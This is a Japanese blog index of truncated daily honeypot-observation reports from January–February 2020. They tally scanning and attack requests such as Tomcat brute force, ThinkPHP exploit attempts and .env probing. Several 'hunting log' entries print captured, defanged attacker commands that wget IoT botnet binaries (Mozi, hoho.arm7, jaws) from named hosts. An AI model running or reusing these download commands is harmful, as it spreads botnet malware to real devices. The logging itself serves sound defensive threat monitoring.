WOWHoneypot観察(329日目)

2020/02/09(日) トータルは140件でした。ハンティングログは以下です。 114.26.224[.]191 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws www.virustotal.com www.virustotal.com 件数 概要 リクエスト 43 アクセス GET / 37 調査 GET /script 7 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html 6 調査 GET /is_test 3 ThinkPHPの脆弱性を狙った通信 PO…

WOWHoneypot観察(328日目)

2020/02/08(土) トータルは104件でした。ハンティングログは以下です。 111.42.103[.]78 wget+hxxp[:]//111.42.103[.]78:54280/Mozi.a www.virustotal.com 件数 概要 リクエスト 59 アクセス GET / 10 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html 8 調査 GET /is_test 3 調査 GET /script 2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha 2 ThinkPHPの脆弱性を…

WOWHoneypot観察(327日目)

2020/02/07(金) トータルは226件でした。ハンティングログはありませんでした。 件数 概要 リクエスト 165 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html 33 アクセス GET / 7 調査 GET /is_test 4 不正中継の調査 HEAD hxxp[:]//tool.chinaz.com/ 3 不正中継の調査 HEAD hxxp[:]//www.speedtest.cn/ 2 phpMyAdminの調査 GET /admin-scripts.asp 2 不正中継の試み CONNECT ip.ws.126.net:443 1 PH…

WOWHoneypot観察(326日目)

2020/02/06(木) トータルは414件でした。ハンティングログは以下です。 80.22.8[.]239 wget hxxp[:]//switchnets[.]net/hoho.arm7 www.virustotal.com www.virustotal.com 113.22.118[.]111 wget+hxxp[:]//scan[.]casualaffinity[.]net/jaws 183.80.231[.]120 wget+hxxp[:]//scan[.]casualaffinity[.]net/jaws 95.57.107[.]84 wget+hxxp[:]//scan[.]c…

WOWHoneypot観察(325日目)

2020/02/05(水) トータルは136件でした。ハンティングログは以下です。 190.192.77[.]168 wget+hxxp[:]//scan.casualaffinity.net/jaws 42.113.12[.]225 wget+hxxp[:]//scan.casualaffinity.net/jaws 195.177.106[.]163 wget+hxxp[:]//scan.casualaffinity.net/jaws www.virustotal.com www.virustotal.com 件数 概要 リクエスト 55 Tomcat管理ページに対するブルートフォース攻撃…

WOWHoneypot観察(324日目)

2020/02/04(火) トータルは4110件でした。ハンティングログは以下です。 94.89.40[.]90 wget hxxp[:]//switchnets.net/hoho.arm7 www.virustotal.com www.virustotal.com 件数 概要 リクエスト 4023 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html 41 アクセス GET / 9 調査 GET /is_test 6 Wordpress管理画面の調査 GET /wp-admin/ 4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/ind…

WOWHoneypot観察(323日目)

2020/02/03(月) トータルは121件でした。ハンティングログは以下です。 220.92.153[.]250 wget hxxp[:]//switchnets.net/hoho.arm7 www.virustotal.com www.virustotal.com 89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101[.]182/.t/80/arm7 www.virustotal.com www.virustotal.com 182.127.55[.]152 wget+hxxp[:]//182.127.55[.]152:53566/Mozi.m w…

WOWHoneypot観察(322日目)

2020/02/02(日) トータルは269件でした。ハンティングログは以下です。 46.166.187[.]111 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7 89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7 89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7 www.virustotal.com www.virustotal.com 件数 概要 リクエスト 163 Tomcat管理ページに対するブルー…

WOWHoneypot観察(321日目)

2020/02/01(土) トータルは434件でした。ハンティングログはありませんでした。 件数 概要 リクエスト 360 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html 40 アクセス GET / 17 環境設定の調査 GET /.env 7 調査 GET /script 3 WordPressの調査 GET /wp-config.php 1 調査 POST /base/post.php 1 クローリング HEAD /robots.txt 1 調査 GET /logs 1 調査 GET /login 1 ThinkPHPの脆弱性を狙った通信 GET /…

WOWHoneypot観察(320日目)

2020/01/31(金) トータルは66件でした。ハンティングログはありませんでした。 件数 概要 リクエスト 36 アクセス GET / 21 調査 GET /script 3 Tomcat管理ページの調査 GET /manager/html 3 不正中継の試み CONNECT ip.ws.126.net:443 1 調査 POST /base/post.php 1 アクセス GET /favicon.ico 1 Joomla!の脆弱性(CVE-2016-10379)の調査 GET /administrator/index.php

WOWHoneypot観察(319日目)

2020/01/30(木) トータルは96件でした。ハンティングログは以下です。 89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101[.]182/.t/80/arm7 www.virustotal.com 件数 概要 リクエスト 53 アクセス GET / 16 調査 GET /script 2 不正中継の調査 HEAD hxxp[:]//123.125.114.144/ 2 不正中継の調査 GET hxxp[:]//www.123cha.com/ 2 Tomcat管理ページの調査 GET /manager/html 2 configファイル調査 GE…